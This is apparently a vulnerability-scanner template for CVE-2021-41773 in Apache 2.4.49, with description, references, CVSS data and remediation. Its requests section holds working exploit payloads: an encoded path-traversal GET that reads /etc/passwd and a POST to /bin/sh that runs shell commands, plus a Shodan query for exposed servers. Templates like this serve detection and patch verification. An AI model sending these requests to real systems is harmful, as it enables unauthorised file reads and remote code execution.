id: CVE-2021-41773 info: name: Apache 2.4.49 - Path Traversal and Remote Code Execution author: daffainfo severity: high description: A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally, this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. reference: - https://github.com/apache/httpd/commit/e150697086e70c552b2588f369f2d17815cb1782 - https://nvd.nist.gov/vuln/detail/CVE-2021-41773 - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 - https://twitter.com/ptswarm/status/1445376079548624899 - https://twitter.com/h4x0r_dz/status/1445401960371429381 - https://github.com/blasty/CVE-2021-41773 remediation: Update to Apache HTTP Server 2.4.50 or later. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-41773 cwe-id: CWE-22 metadata: shodan-query: https://www.shodan.io/search?query=apache+version%3A2.4.49 tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,cisa requests: - raw: - | GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: {{Hostname}} - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded echo Content-Type: text/plain; echo; echo COP-37714-1202-EVC | rev matchers-condition: or matchers: - type: regex name: LFI regex: - "root:.*:0:0:" - type: word name: RCE words: - "CVE-2021-41773-POC" # Enhanced by mp on 2022/02/27